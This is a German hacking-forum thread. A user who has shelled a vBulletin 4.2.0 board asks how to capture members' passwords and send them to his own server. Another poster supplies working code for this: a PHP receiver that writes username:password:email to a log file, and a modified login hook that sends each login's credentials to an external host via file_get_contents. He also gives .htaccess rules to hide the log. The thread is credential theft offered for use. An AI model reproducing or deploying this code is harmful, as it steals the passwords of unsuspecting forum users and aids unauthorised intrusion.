7 Antworten in diesem Thema

[highz]

Liebe Community,
Ich habe erfolgreich ein vBulletin geshellt zwar nichts grosses aber mein erstes "Board".
Darauf würde ich gerne die Passwörter und IP/UA loggen.
Habe auch im Netz zwei kleine Snippets gefunden die mir zumindest das PW logging ermöglichen. Aber ich würde gerne die Logs auf externen Server speichern.

Wie realisiere ich das mit diesen Snippets? Habe zwar eine Idee aber bin mir nicht so sicher deshalb möchte ich euch um Rat fragen.

Hier sind die Snippets:

Please Login HERE or Register HERE to see this link!

Handelt sich um ein vBulletin 4.2.0 Board



MfG
Highz

Bearbeitet von highz, 24 January 2015 - 16:42 Uhr.

[FalkE]

die relevante frage ist ob deine shell schreibrechte (chmod 777) hat oder nur leserechte (755) besitzt.

[highz]

Besitz 755 aber konnte das Admin Pw durch einen billigen Trick ergaunern

[FalkE]

Besitz 755 aber konnte das Admin Pw durch einen billigen Trick ergaunern

ich dachte deine frage war jetzt eher auf das allgemeine logging bezogen.

[highz]

ich dachte deine frage war jetzt eher auf das allgemeine logging bezogen.

Nein, möchte halt das "logging plugin" also die Code Snippets die ich oben geposted habe so umändern das es nicht die Logs in einem lokalen Ordner wie dort: /includes/lg.html speichert sondern dass das Plugin die Logs an einen externen Server weiterreicht wie z.B.

Please Login HERE or Register HERE to see this link!

Bearbeitet von highz, 24 January 2015 - 16:19 Uhr.

[R3s1stanc3]

Du legst auf deinen Server, auf dem die Logs geschrieben werden sollen folgende PHP Datei:

<?php
$fp = fopen ( "log.txt", "a+" ) ;
fwrite ( $fp, $_GET["user"] . ':' . $_GET["pass"] . ':' . $_GET["mail"] . "\n" ) ;
fclose ( $fp ) ;
?>

Dein logging Plugin passt du dann so an, dass statt in eine Datei zu schreiben folgender HTTP Request gestellt wird (z.B. mit Hilfe von curl):

"http://site.com/log.php?user=".$lg_username."&pass=".$lg_password."&mail=".$row["email"]

Dann werden die Logs auf deinem Server in die Datei log.txt geschrieben. 

Edit:

einfacher als curl ist folgendes:

@file_get_contents ( "http://site.com/log.php?user=" . $lg_username . "&pass=" . $lg_password . "&mail=" . $row["email"] ) ;

Bearbeitet von R3s1stanc3, 25 January 2015 - 02:15 Uhr.

[highz]

Du legst auf deinen Server, auf dem die Logs geschrieben werden sollen folgende PHP Datei:

<?php
$fp = fopen ( "log.txt", "a+" ) ;
fwrite ( $fp, $_GET["user"] . ':' . $_GET["pass"] . ':' . $_GET["mail"] . "\n" ) ;
fclose ( $fp ) ;
?>

Dein logging Plugin passt du dann so an, dass statt in eine Datei zu schreiben folgender HTTP Request gestellt wird (z.B. mit Hilfe von curl):

"http://site.com/log.php?user=".$lg_username."&pass=".$lg_password."&mail=".$row["email"]

Dann werden die Logs auf deinem Server in die Datei log.txt geschrieben. 
Edit:
einfacher als curl ist folgendes:

@file_get_contents ( "http://site.com/log.php?user=". $lg_username . "&pass=" . $lg_password . "&mail=" . $row["email"] ) ; 

Danke für deine Hilfe, leider schaffe ich es nicht das Plugin mit deinem curl oder file_get_contents vorschlag anzupassen. .

[R3s1stanc3]

$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$lg_file = "./includes/lg.html";
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");

while($row = @mysql_fetch_array($sql_query))
{

if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
@file_get_contents ( "http://site.com/log.php?user=". $lg_username . "&pass=" . $lg_password . "&mail=" . $row["email"] ) ;
}
}

Sollte funktionieren. Ich bin aber kein PHP Coder und übernehme keine Verantwortung, wenn mein Script vuln ist oder irgendetwas nicht funktioniert

 

Ggf willst du nicht, dass man aus dem Web die log.txt lesen kann, dann schreibst du folgendes in deine .htaccess

<Files ./log.txt>
Order Allow,Deny
Deny from all
</Files>